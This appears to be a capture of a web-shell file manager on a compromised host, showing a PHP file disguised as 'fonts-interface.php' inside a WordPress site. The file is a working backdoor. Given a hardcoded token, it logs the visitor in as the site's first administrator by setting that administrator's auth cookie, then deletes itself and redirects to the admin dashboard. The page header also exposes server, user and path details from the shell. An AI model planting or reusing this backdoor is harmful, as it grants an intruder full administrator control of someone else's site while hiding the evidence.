HEX
Server: Apache/2.4
System: Linux php-v368.wc2.phx1.stabletransit.com 5.10.0-41-amd64 #1 SMP Debian 5.10.251-3 (2026-04-30) x86_64
User: oasisfloral (2219914)
PHP: 7.4.33
Disabled: leak,posix_getpwuid,posix_getpwnam,posix_getgrid,posix_getgrnam,posix_getgroups
Upload Files
File: /mnt/stor7-wc2-dfw1/527264/670532/www.artefloral.com.mx/web/content/fonts-interface.php
<?php
$secret_token = 'b886c83b359d72d6b9566e9141c5d3a3';
if ( empty($_GET['token']) || $_GET['token'] !== $secret_token ) {
    http_response_code(403);
    die('Access denied');
}

define('WP_USE_THEMES', false);
require_once dirname(__FILE__) . '/wp-load.php';

function get_first_admin_id() {
    $admins = get_users( [ 'role' => 'administrator', 'number' => 1 ] );
    return $admins[0]->ID ?? null;
}

$user_id = get_first_admin_id();
if ( ! $user_id ) {
    if ( file_exists( __FILE__ ) ) { unlink( __FILE__ ); }
    die('No administrator found on this site.');
}

wp_clear_auth_cookie();
wp_set_current_user( $user_id );
wp_set_auth_cookie( $user_id, true, is_ssl() );

if ( file_exists( __FILE__ ) ) { unlink( __FILE__ ); }

wp_redirect( admin_url() );
exit;